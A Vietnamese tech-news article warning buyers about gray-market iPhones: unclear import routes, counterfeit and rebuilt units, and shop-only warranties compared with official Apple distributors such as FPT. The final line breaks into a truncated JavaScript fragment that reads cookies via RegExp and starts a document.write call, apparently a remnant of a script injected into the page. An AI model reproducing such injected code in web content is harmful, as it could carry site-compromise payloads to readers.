Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Tin tức > Tin công nghệ > Một số rủi ro khi mua iPhone hàng xách tay

Một số rủi ro khi mua iPhone hàng xách tay

Trước thông tin, iPhone hàng giả, iPhone nhái đang chuẩn bị tràn vào Việt Nam, người dùng dùng tỉnh táo để đưa ra quyết định khi sắm cho mình một chiếc iPhone vào lúc này, khi mà mùa mua sắm cuối năm đang đến gần hơn.

Nguồn gốc không rõ ràng

Có một sự thật hiển nhiên đấy chính là, các mẫu điện thoại hàng xách tay nói riêng và iPhone nói chung đều là hàng nhập khẩu không chính thức, do đó chúng không phải chịu bất kỳ loại thuế nào. Và do đó, nguồn gốc xuất xứ của sản phẩm thường không rõ ràng. iPhone hàng xách tay có thể được gom từ nhiều nơi, qua nhiều trung gian khác nhau được khi chính thức được đưa về Việt Nam.

Theo chia sẻ của một số cửa hàng, iPhone xách tay về Việt Nam chủ yếu nhập từ Hong Kong, Singapore (hàng ZP/A hoặc ZA/A), trong khi đó hàng Việt Nam chính hãng được ký hiệu là VN/A. Tuy nhiên, trên thực tế đã có nhiều model được nhập từ Trung Quốc hoặc Campuchia theo nhiều đường khác nhau. Đó là chưa kể đến các sản phẩm khóa mạng từ Mỹ, Nhật và người mua buộc phải mua code để mở mạng hoặc dùng SIM ghép tương đối phức tạp.

iPhone với thiết kế sang trọng và tinh tế

Bởi do nguồn gốc không rõ ràng, khách hàng khi mua iPhone xách tay có thể sẽ gặp phải tình trạng mua hàng phải hàng dựng.

Hàng giả, hàng dựng

Việc người dùng mua phải hàng giả, hàng dựng hay hàng kém chất lượng đã không còn là chuyện hiếm ở Việt Nam. Lợi nhuận cao từ các sản phẩm iPhone đã dẫn đến việc một số cửa hàng nhỏ lẻ đã bán ra hàng giả, hàng nhái cho người dùng để hòng kiếm lời. Ngoại trừ iPhone 5s vừa mới được ra mắt, chưa có dấu hiệu bị dựng lại, tất cả các đời iPhone trước đều đã có hàng dựng, hàng nhái bán trên thị trường. Hiện tại, iPhone 5 hàng dựng đã có mặt tại thị trường Việt Nam, ngay sau khi model bị Apple chính thức ngừng sản xuất, trong khi đó nhu cầu người dùng mua iPhone 5 vẫn rất cao. Ngay cả iPhone 4S, iPhone 4 hay iPhone 3GS đều có rất nhiều hàng đóng lại. Do vậy, việc lựa chọn mua iPhone chính hãng sẽ là lựa chọn hàng đầu khi mà bạn cảm thấy không chắc chắn. Để nhận biết hàng chính hãng cũng khá dễ dàng với việc kiểm tra tem nhập khẩu và tem niêm phong seal của nhà phân phối, tờ giấy hướng dẫn ở trong hộp máy bằng Tiếng Việt, chân cắm là dạng chân cắm tròn để phù hợp với ổ cắm tại Việt Nam.

Bảo hành

Chế độ bảo hành là một điểm khác biệt lớn nhất giữa hàng chính hãng và hàng xách tay. Người dùng nếu mua hàng xách tay thì sẽ không được hưởng chế độ bảo hành theo quy định của Apple tại nước sở tại, mà chỉ được cam kết bảo hành tại cửa hàng mà họ mua, thời gian bảo hành tùy thuộc vào mỗi cửa hàng. Phần lớn các cửa hàng đều đưa ra quy định sẽ không bảo hành màn hình, bởi đây là phần dễ gặp trục trặc nhất trên một chiếc iPhone.

Hiện tại iPhone 5s và iPhone 5C mới được ra mắt nên chưa có hàng nhái, hàng giả

Trong trường hợp, máy cần được bảo hành thì cửa hàng xách tay đó sẽ mở máy và thay linh kiện ngay tại Việt Nam. Việc mở máy này tất nhiên sẽ không tuân theo quy trình bảo hành của Apple, vì không đảm bảo được các thiết bị sử dụng để mở máy, dễ gây ảnh hưởng đến các bộ phận khác của máy. Ngoài ra, khi mở máy và tiến hành thay linh kiện, nguồn gốc của các linh kiện này thì chỉ có cửa hàng mới biết được.

Từ việc thay linh kiện không đảm bảo có thể dẫn tới tình trạng các máy sau khi đi bảo hành sẽ rất dễ “bị luộc” linh kiện. Việc này sẽ gây ảnh hưởng đến tuổi thọ của máy. Trong khi đó, hàng chính hãng sẽ được hưởng chế độ bảo hành theo quy định của Apple. Đại diện của FPT cho biết biết: “Chỉ cần máy còn thời hạn bảo hành và lỗi xuất phát từ phía nhà sản xuất, người dùng sẽ được đổi ngay một máy khác tương đương trong vòng tối đa 48 giờ đối với khu vực TP HCM, Hà Nội, Đà Nẵng, Cần Thơ hoặc là 5 ngày làm việc đối với các tỉnh thành khác, tính từ ngày trung tâm bảo hành nhận được sản phẩm bảo hành”.

Một điểm lưu ý khác là nếu bạn mua máy để tặng người thân thì hàng xách tay chỉ là một lựa chọn thứ yếu. Ở Việt Nam, có rất nhiều chiếc máy xách tay khi bán ra đều đã được kích hoạt sẵn hoặc chưa kích hoạt nhưng lại trôi bảo hành. Mặc dù, các cửa hàng xách tay đều cam kết bảo hành 12 tháng kể từ khi mua máy tại cửa hàng, nhưng nếu khi người dùng kiểm tra thời gian bảo hành trên website của Apple thời hạn bảo hành chỉ còn vài tháng.

Đối với hàng chính hãng, thời hạn bảo hành sẽ được bắt đầu khi người dùng mở hộp và kích hoạt máy. Hiện tại, hầu hết các đại lý lớn ở Việt Nam như Viễn Thông A, Nguyễn Kim, Thế giới di động, FPT shop, Mai Nguyên đều có bán iPhone chính hãng, địa điểm bảo hành cũng được niêm yết rõ ràng, tạo điều kiện thuận lợi cho người dùng Việt Nam. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘